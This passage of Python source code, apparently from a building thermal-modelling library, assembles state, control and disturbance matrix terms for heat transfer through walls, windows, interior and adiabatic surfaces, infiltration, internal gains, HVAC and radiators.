* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
)
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_surface_sky']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Share of the interior irradiation incident on the respective surface (wall-area fraction)
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
# Windows for each exterior surface - Modelled as surfaces with neglected heat capacity
if surface_data.at['window_wall_ratio'] != 0.0:
# Complete convective heat transfer from surface to zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
)
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_window_sky']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_window_ground']
+ surface_data.at['heat_transfer_coefficient_window_sky']
)
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
def define_heat_transfer_surfaces_interior():
"""Thermal model: Interior surfaces"""
for surface_name, surface_data in building_data.surfaces_interior.iterrows():
for zone_name in [surface_data.at['zone_name'], surface_data.at['zone_adjacent_name']]:
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Conductive heat transfer from the interior towards the core of surface
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{zone_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1))
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{surface_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
else: # Surfaces with neglected heat capacity
# Get adjacent / opposite zone_name
if zone_name == surface_data.at['zone_name']:
zone_adjacent_name = surface_data.at['zone_adjacent_name']
else:
zone_adjacent_name = surface_data.at['zone_name']
# Total adjacent zone surface area for calculating share of interior (indirect) irradiation.
zone_adjacent_surface_area = sum(
zone_surface_data.at['surface_area']
* (1 - zone_surface_data.at['window_wall_ratio'])
for zone_surface_name, zone_surface_data in pd.concat(
[
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_adjacent_name'] == zone_adjacent_name
],
building_data.surfaces_adiabatic[
building_data.surfaces_adiabatic['zone_name'] == zone_adjacent_name
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone
)
# Complete convective heat transfer from adjacent zone to zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_adjacent_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
zone_adjacent_name + '_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_surface']
) ** (- 1))
/ building_data.zones.at[zone_name, 'heat_capacity']
)
# Windows for each interior surface - Modelled as surfaces with neglected heat capacity
if surface_data.at['window_wall_ratio'] != 0.0:
# Get adjacent / opposite zone_name
if zone_name == surface_data.at['zone_name']:
zone_adjacent_name = surface_data.at['zone_adjacent_name']
else:
zone_adjacent_name = surface_data.at['zone_name']
# Total adjacent zone surface area for calculating share of interior (indirect) irradiation
zone_adjacent_surface_area = sum(
zone_surface_data.at['surface_area']
* (1 - zone_surface_data.at['window_wall_ratio'])
for zone_surface_name, zone_surface_data in pd.concat(
[
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_name'] == zone_adjacent_name
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_adjacent_name'] == zone_adjacent_name
],
building_data.surfaces_adiabatic[
building_data.surfaces_adiabatic['zone_name'] == zone_adjacent_name
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone
)
# Complete convective heat transfer from adjacent zone to zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_adjacent_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_adjacent_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
zone_adjacent_name + '_temperature'
] += (
surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1)
/ building_data.zones.at[zone_name, 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == zone_name
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{zone_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[zone_name, 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_window']
* surface_data.at['surface_area']
* surface_data.at['window_wall_ratio']
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ surface_data.at['heat_transfer_coefficient_conduction_window']
) ** (- 1))
/ building_data.zones.at[zone_name, 'heat_capacity']
)
def define_heat_transfer_surfaces_adiabatic():
"""Thermal model: Adiabatic surfaces"""
for surface_name, surface_data in building_data.surfaces_adiabatic.iterrows():
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Conductive heat transfer from the interior towards the core of surface
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
f'{surface_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
else: # Surfaces with neglected heat capacity
logger.warning(f"Adiabatic surfaces with zero heat capacity have no effect: {surface_name}")
def define_heat_transfer_infiltration():
"""Thermal model: Infiltration."""
for zone_name, zone_data in building_data.zones.iterrows():
state_matrix[
f'{zone_name}_temperature',
f'{zone_name}_temperature'
] += (
- 1.0
* zone_data.at['infiltration_rate']
/ 3600 # Convert 1/h to 1/s.
* zone_data.at['zone_volume']
* building_data.parameters.at['heat_capacity_air']
/ zone_data.at['heat_capacity']
)
disturbance_matrix[
f'{zone_name}_temperature',
'ambient_air_temperature'
] += (
zone_data.at['infiltration_rate']
/ 3600 # Convert 1/h to 1/s.
* zone_data.at['zone_volume']
* building_data.parameters.at['heat_capacity_air']
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_internal_gains():
"""Thermal model: Internal gains."""
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['internal_gain_type']):
disturbance_matrix[
f'{zone_name}_temperature',
zone_data.at['internal_gain_type'] + '_internal_gain_occupancy'
] += (
zone_data.at['occupancy_density']
* zone_data.at['occupancy_heat_gain']
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
disturbance_matrix[
f'{zone_name}_temperature',
zone_data.at['internal_gain_type'] + '_internal_gain_appliances'
] += (
zone_data.at['appliances_heat_gain']
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_generic():
"""Thermal model: Generic HVAC systems."""
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_generic_type']):
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_generic_heat_thermal_power'
] += (
1.0
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
control_matrix[
f'{zone_name}_temperature',
f'{zone_name}_generic_cool_thermal_power'
] += (
- 1.0
* zone_data.at['zone_area']
/ zone_data.at['heat_capacity']
)
def define_heat_transfer_hvac_radiator():
"""Define state equations describing the heat transfer occurring due to radiators."""
if pd.notnull(building_data.zones['hvac_radiator_type']).any():
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_radiator_type']):
# Thermal power input to water.
control_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_thermal_power'
] += (
1.0
* zone_data.at['zone_area']
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator hull front and water.
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_front_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_hull_front_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
if zone_data.at['radiator_panel_number'] == '2':
# Heat transfer between radiator panel 1 hull rear and water.
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_1_hull_rear_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_panel_1_hull_rear_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator panel 2 hull front and water.
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_panel_2_hull_front_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_panel_2_hull_front_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
# Heat transfer between radiator hull rear and water.
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_hull_rear_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_hull']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_hull_rear_temperature'
] += (
1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
)
state_matrix[
f'{zone_name}_radiator_water_mean_temperature',
f'{zone_name}_radiator_water_mean_temperature'
] += (
- 1.0
/ (0.5 * zone_data.at['thermal_resistance_radiator_hull_conduction'])
/ zone_data.at['heat_capacitance_water']
